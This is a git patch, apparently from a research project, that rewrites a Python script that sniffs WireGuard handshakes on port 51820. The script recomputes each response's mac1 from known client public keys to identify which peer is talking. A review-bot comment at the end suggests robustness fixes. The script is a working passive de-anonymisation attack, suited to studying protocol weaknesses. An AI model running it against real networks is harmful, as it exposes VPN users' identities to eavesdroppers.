From 0bcf19ac7cc109fb1f8710205cca318ace61092b Mon Sep 17 00:00:00 2001
From: Boris LONJON <boris.lonjon@limos.fr>
Date: Thu, 18 Jan 2024 12:09:41 +0100
Subject: [PATCH] Working script
---
wireguard-attacker/attack | 133 +++++++++++++++++++++-----------------
1 file changed, 73 insertions(+), 60 deletions(-)
diff --git a/wireguard-attacker/attack b/wireguard-attacker/attack
index dad3e24..906ed92 100755
--- a/wireguard-attacker/attack
+++ b/wireguard-attacker/attack
@@ -1,68 +1,81 @@ #!/usr/bin/env python - -from pprint import pprint -from hashlib import blake2b +import signal +import sys +import hashlib +from base64 import b64decode from scapy.all import sniff, IP, UDP, Raw from binascii import hexlify -from pprint import pprint -# import subprocess +MAC_LABEL_CONST = 'mac1----'.encode('utf-8') CLIENT_1_PUBKEY = '85Ey6fLDcFadWd+MRPHAuBEAHJ6MIUbl2jNsCZJXmRI=' CLIENT_2_PUBKEY = 'gtPyxcaZzC7LkLq/QGzvVLEHaIOfdJ6nb79wx8C7YT8=' -SERVER_PUBKEY = '+O7mAJK0m7Ts62WuP1Et1/RanAq5yFPAgDxuyR9TtD4=' + + +def signal_handler(sig, frame): + print('You pressed Ctrl+C!\n Exiting') + sys.exit(0) def split_packet(data): - # if UDP in packet and Raw in packet: - # udp_payload = packet[UDP].payload - # if len(udp_payload) >= 32: # Ensure there's enough data for the WireGuard handshake - # data = bytes(udp_payload) - if data[0] == 1: - return { - 'type': data[0], - 'reserved': hexlify(data[1:4]), - 'sender': hexlify(data[4:8]), - 'ephemeral': hexlify(data[8:40]), - 'enc_static': hexlify(data[40:88]), - 'enc_ts': hexlify(data[88:116]), - 'mac1': hexlify(data[116:132]), - 'mac2': hexlify(data[132:148]) - } - if data[0] == 2: - return { - 'type': data[0], - 'reserved': hexlify(data[1:4]), - 'sender': hexlify(data[4:8]), - 'ephemeral': hexlify(data[8:40]), - 'enc_static': hexlify(data[40:88]), - 'enc_ts': hexlify(data[88:116]), - 'mac1': hexlify(data[116:132]), - 'mac2': hexlify(data[132:148]) - } - - # # Extract mac1 (last 32 bytes of the UDP payload) - # hex_udp_payload = hexlify(bytes(udp_payload)[-32:-16]) - # mac1 = hex_udp_payload - # return mac1.decode('utf-8') - # return None - - -# Set the network interface to promiscuous mode using subprocess -interface = "eth1" -# subprocess.run(["sudo", "ifconfig", interface, "promisc"]) - -packets = [] -sniff(iface=interface, filter="udp and port 51820", lfilter=lambda packet: bytes(packet[UDP].payload)[0] == 1 or bytes(packet[UDP].payload)[0] == 2, prn=lambda packet: 
packets.append(bytes(packet[UDP].payload)), count=2) - - -handshake = split_packet(packets[0]) -response = split_packet(packets[1]) - - -print('Handshake:') -print('U=' + str(handshake['enc_static'])) -print('mac1=' + str(handshake['mac1'])) - -print() -print('Response:') -print('U=' + str(response['enc_static'])) -print('mac1=' + str(response['mac1'])) \ No newline at end of file + if data[0] == 1: + return { + 'type': data[0], + 'reserved': data[1:4], + 'sender': data[4:8], + 'ephemeral': data[8:40], + 'enc_static': data[40:88], + 'enc_ts': data[88:116], + 'mac1': data[116:132], + 'mac2': data[132:148], + } + if data[0] == 2: + return { + 'type': data[0], + 'reserved': data[1:4], + 'sender': data[4:8], + 'receiver': data[8:12], + 'ephemeral': data[12:44], + 'enc_empty': data[44:60], + 'mac1': data[60:76], + 'mac2': data[76:92], + 'remaining': data[0:60] + } + +def compute_mac(client_pubkey, packet): + + pubkey = b64decode(client_pubkey) + + items = MAC_LABEL_CONST + pubkey + fingerprint = hashlib.blake2s(items, digest_size=32) + mac = hashlib.blake2s(packet, key=fingerprint.digest(), digest_size=16) + + return mac + + +def listen(): + + interface = "eth1" + + packets = [] + sniff(iface=interface, filter="udp and port 51820", lfilter=lambda packet: bytes(packet[UDP].payload)[0] == 1 or bytes(packet[UDP].payload)[0] == 2, prn=lambda packet: packets.append(bytes(packet[UDP].payload)), count=2) + + initialization = split_packet(packets[0]) + response = split_packet(packets[1]) + + return (initialization, response) + +signal.signal(signal.SIGINT, signal_handler) + +print("Press Ctrl+C to exit program\n") + +while True: + + packets = listen() + response = packets[1] + + c_mac1 = compute_mac(CLIENT_1_PUBKEY, response['remaining']) + c_mac2 = compute_mac(CLIENT_2_PUBKEY, response['remaining']) + + print() + print('observed mac1 = ' + hexlify(response['mac1']).decode('utf-8')) + print("computed mac1 client1 = " + c_mac1.hexdigest()) + print("computed mac1 client2 = " + 
c_mac2.hexdigest()) -- GitLab
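Review bot: `split_packet` slices fixed offsets out of a payload taken straight off the wire without checking its length, so any datagram on port 51820 that merely starts with byte 1 or 2 produces silently truncated `mac1` and `remaining` fields. The offsets imply minimum sizes of 148 and 92 bytes, so the two branches should begin with `if len(data) < 148: return None` and `if len(data) < 92: return None`. The `lfilter` lambda has the same problem one step earlier: it indexes `[0]` on the payload, which raises IndexError on an empty UDP datagram and stops the capture, so it should test the length before indexing. `listen()` also assumes the two captured messages arrive as initiation then response. Two type-1 messages in a row make `response['remaining']` raise KeyError in the main loop, which needs `if response is None or response['type'] != 2: continue` before the MACs are computed.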